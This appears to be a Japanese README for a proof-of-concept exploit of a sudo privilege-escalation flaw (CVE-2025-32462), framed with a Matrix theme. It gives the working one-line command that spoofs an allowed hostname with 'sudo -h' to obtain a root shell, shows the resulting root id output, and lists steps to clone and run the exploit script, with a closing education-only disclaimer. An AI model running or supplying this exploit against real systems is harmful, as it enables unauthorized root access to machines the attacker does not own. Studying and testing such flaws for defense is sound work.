
ホスト名スプーフィングによる権限昇格 (CVE-2025-32462)
「青い薬を飲めば…話は終わる。赤い薬を飲めば…rootを手に入れる。」
このエクスプロイトは、sudoの権限昇格脆弱性(CVE-2025-32462)を示しています。この脆弱性では、-hフラグを使用してホスト名ベースの制限をバイパスできます。PoCは、制限付きユーザー環境を作成し、許可されたホスト名を偽装してそれを脱出し、rootアクセスを取得します。
[user@matrix-node]$ sudo -h zion-core bash # 許可されたホスト名を偽装
[root@matrix-node]# id # 間違ったホスト名でrootを取得!
uid=0(root) gid=0(root) groups=0(root)
リポジトリのクローン:
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
実行可能にして実行:
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
対話型プロンプトに従ってデモンストレーション:
教育/研究目的のみ。所有しているか、テスト許可を得たシステムでのみ使用してください。